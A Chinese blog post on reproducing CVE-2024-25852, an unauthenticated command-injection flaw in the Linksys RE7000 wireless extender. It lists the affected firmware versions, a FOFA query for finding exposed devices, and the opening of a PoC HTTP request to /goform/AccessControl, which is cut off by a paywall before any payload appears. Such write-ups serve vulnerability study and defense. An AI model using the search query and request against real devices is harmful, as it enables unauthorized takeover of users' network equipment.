Linksys RE7000无线扩展器 RCE漏洞复现(CVE-2024-25852)

已于 2024-04-20 14:22:44 修改
阅读量709 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全
于 2024-04-20 14:22:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137998570
版权

0x01 产品简介

Linksys是贝尔金旗下一个销售家用与小型业务用网络产品的部门,主要经营宽带与无线路由器。RE7000是Linksys推出的一款新型双频AC1900无线扩展器,具有无缝漫游功能。

0x02 漏洞概述

Linksys RE7000无线扩展器在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。

0x03 影响范围

RE7000 v2.0.9、RE7000 v2.0.11、RE7000 v2.0.15

0x04 复现环境

FOFA:body="/login.shtml?ran="

0x05 漏洞复现

PoC

PUT /goform/AccessControl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

{
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
宽带宝固件KDB-LINKSYS-RE6500-1.00.0214
06-01
【宽带宝固件KDB-LINKSYS-RE6500-1.00.0214】是一个针对LINKSYS RE6500型号Wi-Fi信号增强的固件更新,该固件版本为1.00.0214。固件是设备的操作系统,它控制和管理设备的所有功能,包括网络连接、安全设置、性能...
CVE-2024-29269 某国外路由RCE漏洞_72
fushuang333的博客
04-12 664
CVE-2024-29269 某国外路由RCE漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。
漏洞Linksys RE7000无线扩展 命令注入漏洞(CVE-2024-25852)
qq_67810151的博客
04-22 243
Linksys RE7000无线扩展存在命令注入漏洞,未授权的攻击者可以通过该漏洞执行任意命令,控制服务
Linksys RE7000 “AccessControlList ”命令执行漏洞(CVE-2024-25852 )
wan___she__pi的博客
04-25 553
Linksys RE7000 是由 Linksys 公司生产的一款 Wi-Fi 信号扩展Linksys 是一家知名的网络设备制造商。RE7000 的设计目的是增强和扩展有 Wi-Fi 网络的覆盖范围,帮助消除无信号区域,并改善信号薄弱的区域的连接质量。Linksys RE7000 v2.0.9、2.0.11和v 2.0.15在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞
F-logic DataCube3 任意文件上传漏洞(CVE-2024-25832)
0xSec
03-15 1104
F-logic DataCube3/admin/setting_photo.php接口处存在任意文件上传漏洞 ,未经身份验证的攻击者可通过该漏洞在服务端写入后门,获取服务权限,进而控制整个web服务
CrushFTP 服务端模板注入漏洞(CVE-2024-4040)
huangyongkang666的博客
04-27 1100
CrushFTP是由CrushFTP LLC开发的文件传输服务软件。CrushFTP的主要用途是提供安全、可靠的文件传输服务。它允许用户通过多种协议(如FTP、SFTP、HTTP、WebDAV等)安全地上传、下载和管理文件。CrushFTP提供了许多安全特性,包括SSL/TLS加密、用户认证、目录权限控制等。CrushFTP被广泛用于企业、教育机构和个人用户之间安全地传输文件。由于CrushFTP 存在服务端模板注入漏洞,未经身份验证的远程攻击者可以逃避虚拟文件系统(VFS)沙箱,绕过身份验证获得管理访
漏洞】JumpServer(CVE-2024-29201、29202) 附带POC
qq_43355651的博客
04-02 2693
漏洞
CrushFTP 服务端模板注入漏洞(CVE-2024-4040)
0xSec
04-26 725
由于CrushFTP 存在服务端模板注入漏洞,未经身份验证的远程攻击者可以逃避虚拟文件系统(VFS)沙箱,绕过身份验证获得管理访问权限,泄露敏感信息或执行代码。目前该漏洞技术细节与PoC已在互联网上公开,鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
Linksys RE4000W_v1.0.01.001_20180321无线中继固件
10-28
May 11, 2018 This document contains the licenses and notices for open source software used in RE4000W v1.0.01.001 . With respect to the free/open source software listed in this document, if you have ...
wooluo#POC#Linksys WRT160NL 身份验证命令注入(CVE-2021-25310)1
07-25
Linksys WRT160NL 身份验证命令注入(CVE-2021-25310)成功利用此漏洞可能导致在受影响的设备上远程执行代码。缺少输出编码和输入验证,使
基础电子中的优化Wi-Fi 提高无线网络性能
11-12
在过去几年里,大多数售出的无线路由都具有QoS功能,但是你可能还是希望能够更新路由的固件来解决问题。  就拿一台Linksys的路由来举例吧,我们可以通过配置程序做一些改变。首先确定你的设备是支持WMM(Wi-...
思科Linksys EA6500无线路由官方固件1.1.29.162351版
08-12
【思科Linksys EA6500无线路由官方固件1.1.29.162351版】是思科公司为Linksys EA6500无线路由提供的一个重要软件更新。固件,简单来说,就是控制硬件设备运行的软件,它包含了设备的操作系统和驱动程序,对设备...
Zabbix自动发
Lzcsfg的博客
07-08 727
在 Zabbix 中,自动发(Auto Discovery)是一种强大的功能,用于自动识别和监控网络设备、服务或应用程序中的动态变化。通过自动发功能,Zabbix 可以自动添加、配置和监控新的网络节点或服务,大大简化了管理和监控大规模环境的杂性。
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
最新发布
2401_82916694的博客
07-10 424
选择Shared模式,你的Mac会当作虚拟机的路由。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
从零开始做题:logtime
weixin_44626085的博客
07-10 108
给出1个pcapng文件。
【观成科技】Websocket协议代理隧道加密流量分析与检测
GCKJ_0824的博客
07-10 512
Websocket中的掩码加密使用异或(xor)做简单的加密,当MASK字段对应位被设置为 1 时表示加密,那么后续会设置4字节的Masking-key,Mask位设置为 0 时表示不加密,则不会携带Masking-key。观成科技的安全团队通过研究Websocket协议本身结构特点,并与对应的工具流量相结合,从而提出行之有效的检测方法应用于产品当中,能在Websocket流量中准确发异常,找出相关隧道的搭建和使用痕迹,保障客户网络的安全。Websocket协议代理工具加密流量检测。
基于STM32设计的管道有害气体检测装置(ESP8266局域网)176
07-06 761
基于STM32设计的管道有害气体检测装置采用了一系列先进的传感技术,针对多种有害气体进行检测,通过实时监测烟雾浓度、甲烷、一氧化碳、甲醛等有害气体的浓度以及温湿度等参数,并通过OLED显示和ESP8266上传数据至手机端,可以使相关工作人员及时了解管道环境的情况,采取相应的控制和调节措施,从而保障工作人员和公众的健康与安全。 为了确保传感正常工作和数据的准确性,装置还引入了温湿度检测机制,因为气体传感的性能受温湿度影响较大,适宜的温度和湿度条件能够确保传感的稳定工作和数据准确性。
UDP协议介绍和作用
小蜜蜂vs码农
07-10 822
UDP协议介绍和作用
ac1900 linksys_linksys思科WRT1900ACS刷机变砖维修
05-13
如果你的Linksys WRT1900ACS路由因为刷机而变砖了,你可以尝试以下步骤进行修: 1. 从Linksys官方网站上下载固件文件,并将其保存到电脑上。 2. 将路由连接到电脑上,使用网线连接。 3. 打开Web浏览,输入路由的IP地址(通常是192.168.1.1)进入路由管理界面。 4. 在管理界面中,选择“Firmware Upgrade”(固件升级)选项,然后点击“Browse”(浏览)按钮,找到并选择你下载的固件文件。 5. 点击“Start Upgrade”(开始升级)按钮,等待固件升级完成。 6. 在固件升级完成后,路由会自动重启。等待几分钟,直到路由重新启动并且网络连接正常。 如果以上步骤无法修路由,你可以尝试使用Linksys官方提供的恢工具进行修。具体操作步骤可以参考Linksys官方网站上的说明文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值